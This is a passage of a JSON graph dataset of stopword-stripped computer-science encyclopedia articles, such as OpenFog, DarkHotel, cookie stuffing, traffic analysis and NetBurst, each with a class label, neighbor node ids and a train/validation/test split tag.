    "text": "OpenFog_Consortium:openfog consortium openfog consortium sometimes stylized open fog consortium consortium high tech industry companies academic institutions across world aimed standardization promotion fog computing various capacities fields consortium founded cisco systems intel microsoft princeton university dell arm holdings 2015 57 members across north america asia europe including forbes 500 companies noteworthy academic institutions openfog consortium merged industrial internet consortium january 31 2019 openfog created november 19 2015 arm holdings cisco systems dell intel microsoft princeton university idea consortium centered advancement dissemination fog computing thought helder antunes cisco executive history iot mung chiang princeton university professor dean purdue university college engineering tao zhang cisco distinguished engineer cio ieee communications society openfog released reference architecture fog computing 13 february 2017 fog world congress 2017 hosted october 2017 openfog conjunction ieee communications society first congress devoted fog computing openfog consortium governed board directors chaired cisco senior director helder antunes board directors made 11 seats representing one following companies institutions arm cisco dell intel microsoft princeton university ieee ge zte shanghai tech university consortium general membership currently comprises 13 academic members aalto university arizona state university california institute technology georgia state university national chiao tung university national taiwan university shanghai research centre wireless communication chinese university hong kong university colorado boulder university southern california university pisa vanderbilt university wayne state university 20 additional members hitachi internet initiative japan itochu kii nebbiolo prismtech nec ngd systems ntt communications osisoft real-time innovations relayr sakura internet stichting imec nederland toshiba ttt tech fujitsu foghorn systems tttech marsec february 2016 openfog consortium published white paper openfog reference architecture outlined eight pillars openfog architecture security scalability open autonomy programmability ras reliability availability serviceability agility hierarchy february 2017 openfog consortium published openfog reference architecture discusses eight technical pillars fog computing 2017 openfog consortium published industry glossary fog computing terms july 2018 ieee standards association announced adopted openfog reference architecture first standard fog computing",
    "neighbors": [
      8355,
      8900,
      4964,
      9137,
      6834,
      1400
    ],
    "mask": "None"
  },
  {
    "node_id": 7639,
    "label": 4,
    "text": "DarkHotel:darkhotel darkhotel darkhotel targeted spear-phishing spyware malware-spreading campaign appears selectively attacking business hotel visitors hotel in-house wifi network characterized kaspersky lab advanced persistent threat attacks specifically targeted senior company executives using forged digital certificates generated factoring underlying weak public keys real certificates convince victims prompted software downloads valid uploading malicious code hotel servers attackers able target specific users guests luxury hotels primarily asia united states zetter 2014 explains group dubbed darkhotel tapaoux also actively infecting users spear-phishing peer-to-peer networks since 2007 key logging reverse engineering targets aimed primarily executives investments development government agencies defense industries electronic manufacturers energy policy makers large number victims located korea china russia japan attackers victim computer sensitive information passwords intellectual property quickly stolen attackers erase tools hopes getting caught july 2017 bitdefender published new research inexsmar another version darkhotel malware used target political figures instead business targets",
    "neighbors": [
      1024,
      7809,
      8320,
      3843,
      5764,
      10502,
      2187,
      4240,
      11152,
      8978,
      10003,
      10132,
      535,
      1688,
      10392,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      11175,
      8489,
      5547,
      11052,
      9518,
      9904,
      1970,
      9395,
      8886,
      10166,
      441,
      1979,
      4027,
      10173,
      10875,
      8640,
      1608,
      3657,
      8779,
      3789,
      4304,
      2815,
      6484,
      4054,
      857,
      1882,
      4314,
      7515,
      9435,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      10477,
      2542,
      3956,
      9460,
      9082,
      507,
      3711
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7640,
    "label": 2,
    "text": "NeXT_Laser_Printer:next laser printer next laser printer next pn n2000 400 dpi postscript laser printer sold next late nextstation nextcube workstations manufactured canon inc included adjustable paper tray enabled print several paper sizes including a4 letter-size legal envelope varieties similar printers based canon sx engine apple laserwriter ii series hp laserjet ii/iii although printers printed 300x300 dpi parts toner cartridge input paper tray interchangeable laserjet ii/iii printer used proprietary high-speed serial interface essence predecessor software-rendering approach used displaypostscript renderer nextstep rather hardware postscript renderer regardless lack dedicated rendering hardware usually achieved close rated speed 8 ppm nextstation much faster cpu 25 33mhz 68040 greater memory capacity 128 mb turbo models rendering engines contemporary printers nextstep used displaypostscript extensively windowing system postscript rendering path optimized thus printed documents true output wysiwyg corresponding screen next also produced color inkjet printer scsi-i-connected tabloid-capable 360 dpi color bubblejet model next pn n2004 us n2005 uk based technology canon bubblejet",
    "neighbors": [
      10406,
      2282,
      7307,
      7806,
      6554,
      8628,
      6234,
      11420,
      350
    ],
    "mask": "Train"
  },
  {
    "node_id": 7641,
    "label": 5,
    "text": "Frequency_grid:frequency grid frequency grid table central frequencies corresponding wavelengths channels allowed communications system common frequency grid used fiber-optic communication used channel spacing dense wavelength division multiplexing dwdm wavelengths around 1550 nm defined itu-t g.694.1 grid defined relative 193.1 thz extends 191.7 thz 196.1 thz 100 ghz spacing defined frequency grid often expressed terms wavelength case covers wavelength range 1528.77 nm 1563.86 nm approximately 0.8 nm channel spacing practical purposes grid extended cover 186 thz 201 thz subdivided provide 50 ghz 25 ghz spaced grids",
    "neighbors": [
      5321
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7642,
    "label": 8,
    "text": "FlexiScale:flexiscale flexiscale utility computing platform launched xcalibre communications summer 2007 subsequently acquired flexiant launched shortly amazon ec2 service europe first world second cloud computing platform users able create start stop servers require allowing rapid deployment needed windows linux supported flexiscale platform flexiscale uses open source xen hypervisor backend storage comes highly redundant san although level redundancy called question august 2008 2 days downtime resulting engineer mistake storage system previously consisted dual head netapp storage array disk shelves connected heads replaced launch flexiscale 2.0 june 2010 amber road based storage solution sun microsystems revisions flexiscale platform publicly available information first version based virtual iron vm management software second revision called flexiscale v1.5 platform based in-house developed vm control system known extility recent release called flexiscale v2.0 contributed extensively revised user interface",
    "neighbors": [
      9665,
      4194,
      39,
      6856,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7643,
    "label": 4,
    "text": "Mod_n_cryptanalysis:mod n cryptanalysis cryptography mod n cryptanalysis attack applicable block stream ciphers form partitioning cryptanalysis exploits unevenness cipher operates equivalence classes congruence classes modulo n method first suggested 1999 john kelsey bruce schneier david wagner applied rc5p variant rc5 m6 family block ciphers used firewire standard attacks used properties binary addition bit rotation modulo fermat prime rc5p analysis conducted modulo 3 observed operations cipher rotation addition 32-bit words somewhat biased congruence classes mod 3 illustrate approach consider left rotation single bit follows thus left rotation single bit simple description modulo 3 analysis operations data dependent rotation modular addition reveals similar notable biases although theoretical problems analysing operations combination bias detected experimentally entire cipher kelsey et al. 1999 experiments conducted seven rounds based conjecture many 19 20 rounds rc5p distinguished random using attack also corresponding method recovering secret key m6 attacks mod 5 mod 257 even effective",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      1114,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Train"
  },
  {
    "node_id": 7644,
    "label": 4,
    "text": "Cookie_stuffing:cookie stuffing world wide web cookie stuffing also cookie dropping affiliate marketing technique result visiting website user receives third-party cookie website unrelated visited user usually without user aware user later visits target website completes qualifying transaction making purchase cookie stuffer paid commission target stuffer actually encouraged user visit target technique considered illegitimate many affiliate schemes websites run affiliate program pay commission affiliates introducing visitors complete one qualifying transactions website owners often join affiliate programs earn commission usually simply sending visitors site running affiliate program via special link advertisement user clicks special link single cookie usually placed user computer considered normal practice way affiliate marketers generate genuine income definition cookies considered stuffed one placed user computer purely result viewing page one added time result single click taken extreme dozens cookies stuffed scattergun approach hope user visit one several target affiliate sites complete qualifying transaction cookie stuffing often referred blackhat online marketing technique potential generate fraudulent affiliate income cookie stuffer may also overwrite legitimate affiliate cookies essentially stealing commission another affiliate perfectly normal user visit website click link directed target affiliate site complete qualifying transaction time user may revisit target affiliate website later time complete qualifying transaction original referring affiliate would credited transaction make commission however many affiliate programs award commission recent referring affiliate original referring affiliate problem occurs cookie stuffing site stuffs visitors batch cookies scattergun approach genuine affiliate cookie may get overwritten user visits target affiliate site completes qualifying transaction cookie stuffer gets credit instead original affiliate brought first genuine visit target site operators websites allow user-generated content forums allow users post content aware various cookie stuffing techniques combat order protect visitors type activity cookie stuffing accomplished something simple including image forum post signature image link compromised purpose cookie stuffer made simulate click forum visitors affiliate link techniques used accomplish cookie stuffing similar used cross-site request forgery csrf attacks pop-ups actually method cookie stuffing accepted affiliate networks pop-up gets website visitor visit site course gives affiliate cookie common place find happening review sites affiliate “ reviews ” product companies pay commission customers interested product still wanted information purchasing probably innocent form cookie stuffing still stuffing none-the-less method defeated utilizing pop-up blocking software iframes way embedding page within page webmaster embeds web page one simple line code affiliate embeds iframe onto page loads affiliate url frames work similar fashion frames deprecated modern browsers techniques longer prevalent codice_1 html tag suggests browser attempt retrieve image url ’ matter url supplied n't extension like .jpg .gif .png end instance codice_2 would actually get anyone visits page send visit google affiliate links put directly creating redirect .htaccess javascript used force user visit url end result visiting affiliate url cascading style sheets define web page displayed retrieved like image would – browser instructed visit url affiliate could put direct affiliate url style sheet image loaded way one harder methods detect adobe flash commonly used create interactive media web contains functionality allows developers force website user visit affiliate link removing spoofing referrer information affiliate network wo n't know traffic came common tactic spoofed referring site legitimate white hat affiliate site mask fact cookie stuffing carried 2008 ebay sued four successful affiliate marketers platform used cookie stuffing techniques brian dunning host skeptoid podcast sentenced fifteen months prison 100 fine five months prison 25,000 fine pleading guilty wire fraud",
    "neighbors": [
      4163,
      3462,
      2470,
      119,
      8923,
      10815
    ],
    "mask": "None"
  },
  {
    "node_id": 7645,
    "label": 3,
    "text": "Codeplay:codeplay codeplay software limited privately owned software tools developer based edinburgh scotland codeplay produces compilers debuggers runtimes testing systems specialized tools aid software development heterogeneous systems special purpose processor architectures including gpus dsps codeplay contributing member multicore association khronos group hsa foundation codeplay founded 2002 andrew richards experienced games developer formerly head software development eutechnyx initial funding company provided jez san obe founder argonaut games arc international codeplay began business developing compilers aimed games programmers releasing vectorc compiler playstation 2 x86 windows pc 2005 codeplay shifted focus developing bespoke c/c++ compilers processor designers since expanded services include development debuggers runtimes testing tools 2011 codeplay announced provided real-time car damage system utilising offload technology 2013 codeplay formed r division received investors people accreditation 2014 codeplay announced working implementation khronos group new provisional standard heterogeneous computing sycl codeplay ceo andrew richards currently chairs working group standard within khronos group computeaorta codeplay multi-target multi-platform toolkit rapidly enabling delivery opencl spir vulkan compute standards currently supporting linux windows android operating systems across x86 arm powerpc mips targets computeaorta also easily customized support new novel hardware architectures opencl standard widely adopted programming model gpus cpus dsps fpgas used extensively professional graphics applications adobe photoshop premiere well wide range open-source software codeplay built proprietary bespoke implementations opencl several customers well significantly contributing development opencl related standards within khronos group codeplay computecpp implementation sycl open standard enabling single source c++ software high-level object-oriented programming codeplay extensive participation standards bodies ensure industry benefits extensive varied knowledge codeplay chairs following standards codeplay contributed following eu-funded research projects",
    "neighbors": [
      1952,
      7234,
      11333,
      9255,
      7978,
      9964,
      6797,
      10316,
      499,
      3413,
      8700,
      823,
      6268
    ],
    "mask": "Test"
  },
  {
    "node_id": 7646,
    "label": 9,
    "text": "Pike_(programming_language):pike programming language pike interpreted general-purpose high-level cross-platform dynamic programming language syntax similar c. unlike many dynamic languages pike statically dynamically typed requires explicit type definitions features flexible type system allows rapid development flexible code dynamically typed languages still providing benefits statically typed language pike features garbage collection advanced data types first-class anonymous functions support many programming paradigms including object-oriented functional imperative programming pike free software released gpl lgpl mpl licenses pike roots lpc language developed muds programmers lysator linköping sweden notably fredrik hübinette per hedbor separated language virtual machine rest mud driver used rapid prototyping language various applications calling lpc4 lpc license allow use commercial purposes new gpl implementation written 1994 called µlpc micro lpc 1996 µlpc renamed pike order provide commercially viable name although name company changed years company known roxen internet software employed many pike developers provided resources pike development roxen also name web server developed company pike 2002 programming environment laboratory linköping university took maintenance pike roxen several pike programmers found way linköping office opera software language plays central role server/gateway parts opera mini application int main syntax requires explanation familiar c c++ pick right away following list shows standard data types pike provides advanced data types sequences queues heaps stacks etc available adt module included pike basic data types container types types pike requires explicit type definitions variables uses information report type errors compile time following code cause compile error value variable number must integer code attempting assign floating point string values int number // integer variable accepts integers number 5.5 // 5.5 floating point value error number 5 // 5 string integer value 5 error kind behavior traditionally considered restrictive limiting proponents dynamically typed languages however unlike c c++ java pike uses flexible type system—specifically system tagged unions system allows programmers declare variables may contain values multiple types something impossible c-family languages without straying bounds safe usage following demonstrates variable hold either integer floating point number int|float number // integer float variable number 5 // legal number 5.5 // also legal variable declared holding many different data types functions provided determine type data currently stored functions form typenamep intp floatp stringp etc int|float number number 5 intp number // returns true number holds int floatp number // returns false number 5.5 floatp number // returns true number holds float additionally special mixed data type definition allows variable hold kind data type mixed anything anything 5 // anything integer value 5 anything 5.5 // anything float value 5.5 anything 5 // anything string value 5 order convert value one type another pike use explicit cast mixed anything anything int 5.5 // anything integer value 5 anything string anything // anything string value 5",
    "neighbors": [
      2304,
      9345,
      6797,
      5521,
      5395,
      5397,
      5546,
      7983,
      10800,
      1591,
      7237,
      7500,
      7144,
      11625,
      7019,
      5612,
      7919,
      9330,
      11386,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7647,
    "label": 3,
    "text": "VESA_Enhanced_Video_Connector:vesa enhanced video connector vesa enhanced video connector vesa standard intended reduce number cables around computer incorporating video audio firewire usb single cable system intention system make monitor central point connection although specific idea find favour computer manufacturers evolved somewhat popular vesa plug display standard vesa evc connector capable carrying analog video vga-based output video input composite firewire audio analogue stereo usb signals pinout somewhat similar newer vesa plug display distinguished plug display connector shell shaped like isosceles trapezoid similar shell d-subminiature instead -shaped shell dvi connector",
    "neighbors": [
      9057,
      10954,
      7594,
      6575,
      11631,
      3453
    ],
    "mask": "Test"
  },
  {
    "node_id": 7648,
    "label": 2,
    "text": "Global_Address_Space_Programming_Interface:global address space programming interface global address space programming interface gpi application programming interface api development scalable asynchronous fault tolerant parallel applications implementation partitioned global address space programming model gpi developed fraunhofer institute industrial mathematics itwm since 2005 initially known fvm fraunhofer virtual machine 2009 name changed global address programming interface gpi 2011 fraunhofer itwm partners fraunhofer scai tud t-systems sfr dlr kit fzj dwd scapos initiated launched gaspi project define novel specification api gaspi based gpi make novel specification reliable scalable universal tool hpc community gpi-2 first open source implementation standard software freely available application developers researchers licenses commercial use available scapos ag gpi completely replaced mpi fraunhofer itwm products research based new gpi-2 modern hardware typically involves hierarchy memory respect bandwidth latency read write accesses within hierarchy non-uniform memory access numa partitions solid state devices ssds graphical processing unit gpu memory many integrated cores mic memory memory segments supposed map variety hardware layers software layer spirit pgas approach gpi segments may globally accessible every thread every gpi process gpi segments also used leverage different memory models within single application even run different applications group subset ranks group members common collective operations collective operation group restricted ranks forming group initial group gaspi_group_all ranks members forming group involves 3 steps creation addition commit operations must performed ranks forming group creation performed using codice_1 operation successful ranks added created group using codice_2 able use created group ranks added must commit group performed using codice_3 collective operation ranks group one-sided asynchronous communication basic communication mechanism provided gpi-2 one-sided communication comes two flavors read write operations single list allocated segments moreover write operations extended notifications enable remote completion events remote rank react one-sided operations non-blocking asynchronous allowing program continue execution along data transfer mechanisms communication gpi-2 following codice_4 possibility use different queues communication requests request submitted one queues queues allow scalability used channels different types requests similar types requests queued get synchronised together independently ones separation concerns gpi-2 provides atomic operations variables manipulated atomically two basic atomic operations codice_5 codice_6 values used global shared variables synchronise processes events failure tolerant parallel programs require non-blocking communication calls gpi-2 provides timeout mechanism potentially blocking procedures timeouts procedures specified milliseconds instance gaspi_block pre-defined timeout value blocks procedure call completion gaspi_test another predefined timeout value blocks procedure shortest time possible i. e. time procedure call processes atomic portion work",
    "neighbors": [
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7649,
    "label": 3,
    "text": "TruCluster:trucluster trucluster closed-source high-availability clustering solution tru64 unix operating system originally developed digital equipment corporation dec transferred compaq 1998 digital acquired company later merged hewlett-packard hp",
    "neighbors": [
      11136,
      5384,
      2986,
      7983,
      5492,
      118,
      3927
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7650,
    "label": 1,
    "text": "Network_model:network model network model database model conceived flexible way representing objects relationships distinguishing feature schema viewed graph object types nodes relationship types arcs restricted hierarchy lattice hierarchical database model structures data tree records record one parent record many children network model allows record multiple parent child records forming generalized graph structure property applies two levels schema generalized graph record types connected relationship types called set types codasyl database generalized graph record occurrences connected relationships codasyl sets cycles permitted levels chief argument favour network model comparison hierarchical model allowed natural modeling relationships entities although model widely implemented used failed become dominant two main reasons firstly ibm chose stick hierarchical model semi-network extensions established products ims dl/i secondly eventually displaced relational model offered higher-level declarative interface early 1980s performance benefits low-level navigational interfaces offered hierarchical network databases persuasive many large-scale applications hardware became faster extra productivity flexibility relational model led gradual obsolescence network model corporate enterprise usage network model original inventor charles bachman developed standard specification published 1969 conference data systems languages codasyl consortium followed second publication 1971 became basis implementations subsequent work continued early 1980s culminating iso specification little influence products bachman influence recognized term bachman diagram diagrammatic notation represents database schema expressed using network model bachman diagram named rectangles represent record types arrows represent one-to-many relationship types records codasyl set types well-known database systems use network model include",
    "neighbors": [
      2688,
      5632,
      8201,
      11024,
      9631,
      1697,
      6831,
      53,
      9397,
      4155,
      7868,
      9147,
      11324,
      2369,
      11457,
      6085,
      9286,
      2512,
      2901,
      7767,
      11098,
      8291,
      9828,
      10340,
      10471,
      3816,
      6383,
      1146,
      6395,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 7651,
    "label": 3,
    "text": "Penguin_Wars:penguin wars player controls one five animals choose cow rabbit bat rat penguin plays games animals nintendo entertainment system arcade editions game five animals penguin bear panda koala beaver game participating animals find opposite sides square table five balls side object game roll balls table soon ten balls one player side player loses game game also time limit 60 seconds reached player fewest balls side wins player hit one balls knocked unconscious certain amount time thus could also said part object game hit opponent otherwise would possible get ten balls side opponent roll back arrived different animals different strengths weaknesses trade-off example rat one move left right fastest return roll balls slowly cow hand slow walker return regains consciousness quickly thirty seconds playing jellybean-like obstacle appears middle table moves left right different kinds obstacles cause varying effects trajectory balls deflect start rolling diagonally players roll parallel sides table whereas others simply ball bounce straight back remake penguin wars announced nintendo switch july 25 2017 game released japan september 21 2017 playstation 4 xbox one versions announced november nintendo switch version released june 27 2019 north america europe",
    "neighbors": [
      5762,
      3788,
      9006,
      1776,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 7652,
    "label": 4,
    "text": "Traffic_analysis:traffic analysis traffic analysis process intercepting examining messages order deduce information patterns communication performed even messages encrypted general greater number messages observed even intercepted stored inferred traffic traffic analysis performed context military intelligence counter-intelligence pattern-of-life analysis concern computer security traffic analysis tasks may supported dedicated computer software programs advanced traffic analysis techniques may include various forms social network analysis traffic analysis method used break anonymity anonymous networks e.g. tors two methods traffic-analysis attack passive active military context traffic analysis basic part signals intelligence source information intentions actions target representative patterns include close relationship traffic analysis cryptanalysis commonly called codebreaking callsigns addresses frequently encrypted requiring assistance identifying traffic volume often sign addressee importance giving hints pending objectives movements cryptanalysts traffic-flow security use measures conceal presence properties valid messages network prevent traffic analysis done operational procedures protection resulting features inherent cryptographic equipment techniques used include traffic-flow security one aspect communications security communications metadata intelligence comint metadata term communications intelligence comint referring concept producing intelligence analyzing technical metadata hence great practical example traffic analysis intelligence traditionally information gathering comint derived intercepting transmissions tapping target communications monitoring content conversations metadata intelligence based content technical communicational data non-content comint usually used deduce information user certain transmitter locations contacts activity volume routine exceptions example certain emitter known radio transmitter certain unit using direction finding df tools position emitter locatable hence changes locations monitored way 're able understand certain unit moving one point another without listening orders reports know unit reports back command certain pattern know another unit reports pattern command two units probably related conclusion based metadata two units transmissions content transmissions using much metadata available commonly used build electronic order battle eob – mapping different entities battlefield connections course eob could built tapping conversations trying understand unit using metadata automatic analysis tool enables much faster accurate eob build-up alongside tapping builds much better complete picture traffic analysis also concern computer security attacker gain important information monitoring frequency timing network packets timing attack ssh protocol use timing information deduce information passwords since interactive session ssh transmits keystroke message time keystroke messages studied using hidden markov models song et al claim recover password fifty times faster brute force attack onion routing systems used gain anonymity traffic analysis used attack anonymous communication systems like tor anonymity network adam back ulf möeller anton stiglic present traffic analysis attacks anonymity providing systems steven j. murdoch george danezis university cambridge presented research showing traffic-analysis allows adversaries infer nodes relay anonymous streams reduces anonymity provided tor shown otherwise unrelated streams linked back initiator remailer systems also attacked via traffic analysis message observed going remailing server identical-length anonymized message seen exiting server soon traffic analyst may able automatically connect sender ultimate receiver variations remailer operations exist make traffic analysis less effective difficult defeat traffic analysis without encrypting messages masking channel actual messages sent channel masked hard hide information size timing messages known solutions require alice send continuous stream messages maximum bandwidth ever use ... might acceptable military applications civilian applications military-versus-civilian problems applies situations user charged volume information sent even internet access per-packet charge isps make statistical assumption connections user sites busy 100 time user simply increase bandwidth link since masking would fill well masking often built end-to-end encryptors becomes common practice isps change traffic assumptions",
    "neighbors": [
      7424,
      1169,
      9233,
      1941,
      150,
      1815,
      9373,
      3629,
      6599,
      6344,
      7119,
      208,
      5986,
      612,
      3428,
      10341,
      7527,
      11241,
      9965,
      4725,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7653,
    "label": 3,
    "text": "Reservation_station:reservation station unified reservation station also known unified scheduler decentralized feature microarchitecture cpu allows register renaming used tomasulo algorithm dynamic instruction scheduling reservation stations permit cpu fetch re-use data value soon computed rather waiting stored register re-read instructions issued designate reservation station want input read multiple instructions need write register proceed logically last one need actually written checks operands available raw execution unit free structural hazard starting execution instructions stored available parameters executed ready results identified unit execute corresponding instruction implicitly register renaming solves war waw hazards since fully associative structure high cost comparators need compare results returned processing units stored addresses tomasulo algorithm instructions issued sequence reservation stations buffer instruction well operands instruction operand available reservation station listens common data bus operand become available operand becomes available reservation station buffers execution instruction begin functional units adder multiplier corresponding reservation station output functional unit connects common data bus reservation stations listening operands need",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      10779,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      6339,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      8944,
      1776,
      757,
      2805,
      10485,
      249,
      1798,
      6926,
      6415,
      1298,
      6950,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      3421,
      8543,
      1376,
      10603,
      4465,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      9707,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 7654,
    "label": 1,
    "text": "Virtual_column:virtual column relational databases virtual column table column whose value automatically computed using columns values another deterministic expression virtual columns part sql standard implemented dbmss like mariadb sql server oracle firebird database server computed syntax two types virtual columns virtual columns values computed fly needed example returned select statement persistent column values computed row inserted table written like values change values change virtual persistent columns advantages disadvantages virtual columns n't consume space disk must computed every time query refers persistent columns n't require cpu time consume disk space however sometimes choice available dbms support one column type neither mariadb mysql fork virtual columns added 5.2 tree expressions used compute virtual columns following limitations persistent columns indexed part foreign key small limitations concerning constraint enforcement virtual columns used tables use storage engine supports storage engines supporting virtual columns mrg_myisam tables based myisam tables include persistent columns corresponding mrg_myisam column defined regular column create table alter table statement used add virtual column syntax used define virtual column following support virtual columns known mysql generated columns started becoming available v5.17.6 various limitations use relaxed subsequent versions since version 11g oracle supports virtual columns microsoft sql server supports virtual columns called computed columns sql server supports persisted non-persisted computed columns firebird always supported virtual columns precursor interbase supports called computed columns firebird supports virtual columns persistent ones allows sub-selects calling built functions external functions stored routines virtual column expression creating virtual column done table creation adding columns existing table syntax used define virtual column following industry standard",
    "neighbors": [
      10340,
      10632,
      8683,
      9389,
      7022,
      10413,
      10737,
      7506,
      9010,
      2901,
      11030,
      3096,
      5403,
      9503
    ],
    "mask": "Test"
  },
  {
    "node_id": 7655,
    "label": 2,
    "text": "John_Lions:john lions john lions 19 january 1937 – 5 december 1998 australian computer scientist best known author lions commentary unix 6th edition source code commonly known lions book lions gained degree first-class honours university sydney 1959 applied received scholarship study university cambridge earned doctorate control engineering 1963 graduation worked consulting firm kcs ltd toronto ontario canada 1967 briefly took position dalhousie university halifax canada moving working burroughs los angeles systems analyst 1972 moved back sydney australia became senior lecturer department computer science university new south wales unsw 1980 promoted associate professor apart sabbaticals 1978 1983 1989 bell laboratories remained school retiring 1995 due bad health john lions married marianne two children katherine elizabeth death john o'brien steve jenkin chris maltby greg rose former students lions commenced campaign raise funds create chair name unsw john lions chair operating systems donations many unsw alumni corporations usenix linux australia chair created 2006 becoming first chair unsw funded contributions alumni 2009 gernot heiser became inaugural john lions chair 2002 unsw dedicated john lions garden front new computer science engineering building lions memory 2011 school computer science engineering unsw initiated john lions award contribution open software prize open high school undergraduate university students enrolled australian secondary tertiary institution full-time part-time students eligible well local internationals students annual prize valued 1,000",
    "neighbors": [
      3488,
      1865,
      7983,
      5492,
      8671
    ],
    "mask": "Train"
  },
  {
    "node_id": 7656,
    "label": 8,
    "text": "YaCy:yacy yacy pronounced ya see free distributed search engine built principles peer-to-peer p2p networks core computer program written java distributed several hundred computers so-called yacy-peers yacy-peer independently crawls internet analyzes indexes found web pages stores indexing results common database called index shared yacy-peers using principles p2p networks free search engine everyone use build search portal intranet help search public internet clearly compared semi-distributed search engines yacy-network decentralised architecture yacy-peers equal central server exists run either crawling mode local proxy server indexing web pages visited person running yacy computer several mechanisms provided protect user privacy access search functions made locally running web server provides search box enter search terms returns search results similar format popular search engines yacy available windows mac linux yacy created 2003 michael christen yacy search engine based four elements yacy uses combination techniques networking administration maintenance indexing search engine including blacklisting moderation communication community yacy performs operations",
    "neighbors": [
      8640,
      11558,
      488,
      5612,
      5677,
      6797,
      7276,
      1520,
      113,
      7807,
      7983,
      9806,
      4725,
      823,
      4472,
      1274,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 7657,
    "label": 3,
    "text": "NetBurst_(microarchitecture):netburst microarchitecture netburst microarchitecture called p68 inside intel successor p6 microarchitecture x86 family cpus made intel first cpu use architecture willamette -core pentium 4 released november 20 2000 first pentium 4 cpus subsequent pentium 4 pentium variants also based netburst mid-2004 intel released foster core also based netburst thus switching xeon cpus new architecture well pentium 4-based celeron cpus also use netburst architecture netburst replaced core microarchitecture based p6 released july 2006 netburst microarchitecture includes features hyper-threading hyper pipelined technology rapid execution engine execution trace cache replay system introduced first time particular microarchitecture never appeared afterwards hyper-threading intel proprietary simultaneous multithreading smt implementation used improve parallelization computations multiple tasks performed x86 microprocessors intel introduced netburst processors 2002 later intel reintroduced nehalem microarchitecture absence core microarchitecture northwood willamette feature external front-side bus runs 100 mhz 64-bits wide also quad-pumped thus giving 3.2 gb/s memory bandwidth intel northwood i850 chipset dual-channel rd-ram provide 3.2 gb/s memory bandwidth presler 800 mhz front-side bus 64-bits wide capable transferring 6.4 gb/s 800 mhz ddr2 memory name given 20-stage instruction pipeline within willamette core significant increase number stages compared pentium iii 10 stages pipeline prescott core 31-stage pipeline stages moving data around cpu although deeper pipeline increased branch misprediction penalty greater number stages pipeline allow cpu higher clock speeds thought offset loss performance smaller instructions per clock ipc indirect consequence pipeline depth—a matter design compromise small number long pipelines smaller ipc greater number short pipelines another drawback stages pipeline increase number stages need traced back event branch predictor makes mistake increasing penalty paid mis-prediction address issue intel devised rapid execution engine invested great deal branch prediction technology intel claims reduces branch mispredictions 33 pentium iii technology two alus core cpu double-pumped meaning actually operate twice core clock frequency example 3.8 ghz processor alus effectively operating 7.6 ghz reason behind generally make low ipc count additionally considerably enhances integer performance cpu intel also replaced high-speed barrel shifter shift/rotate execution unit operates frequency cpu core downside certain instructions much slower relatively absolutely making optimization multiple target cpus difficult example shift rotate operations suffer lack barrel shifter present every x86 cpu beginning i386 including main competitor processor athlon within l1 cache cpu intel incorporated execution trace cache stores decoded micro-operations executing new instruction instead fetching decoding instruction cpu directly accesses decoded micro-ops trace cache thereby saving considerable time moreover micro-ops cached predicted path execution means instructions fetched cpu cache already present correct order execution intel later introduced similar simpler concept sandy bridge called micro-operation cache uop cache replay system little-known subsystem within intel pentium 4 processor primary function catch operations mistakenly sent execution processor scheduler operations caught replay system re-executed loop conditions necessary proper execution fulfilled intel netburst architecture allows branch prediction hints inserted code tell whether static prediction taken taken feature abandoned later intel processors according intel netburst branch prediction algorithm 33 better one p6 despite enhancements netburst architecture created obstacles engineers trying scale performance microarchitecture intel looked attain clock speeds 10 ghz rising clock speeds intel faced increasing problems keeping power dissipation within acceptable limits intel reached speed barrier 3.8 ghz november 2004 encountered problems trying achieve even intel abandoned netburst 2006 heat problems reached level severity developed core microarchitecture inspired p6 core pentium pro tualatin pentium iii-s directly pentium m. intel replaced original willamette core redesigned version netburst microarchitecture called northwood january 2002 northwood design combined increased cache size smaller 130 nm fabrication process hyper-threading technology although initially models 3.06 ghz model feature disabled produce modern higher-performing version netburst microarchitecture february 2004 intel introduced prescott radical revision microarchitecture prescott core produced 90 nm process included several major design changes including addition even larger cache 512 kb northwood 1 mb 2 mb prescott 2m much deeper instruction pipeline 31 stages compared 20 northwood heavily improved branch predictor introduction sse3 instructions later implementation intel 64 intel branding compatible implementation x86-64 64-bit version x86 microarchitecture hyper-threading prescott chips branded pentium 4 ht hardware support feature initially enabled high-end xeon processors officially introduced processors pentium trademark power consumption heat dissipation also became major issues prescott quickly became hottest-running power-hungry intel single-core x86 x86-64 processors power heat concerns prevented intel releasing prescott clocked 3.8 ghz along mobile version core clocked 3.46 ghz intel also released dual-core processor based netburst microarchitecture branded pentium d. first pentium core codenamed smithfield actually two prescott cores single die later presler consists two cedar mill cores two separate dies cedar mill 65 nm die-shrink prescott intel netburst based successors development called tejas jayhawk 40 50 pipeline stages ultimately decided replace netburst core microarchitecture released july 2006 successors directly derived 1995 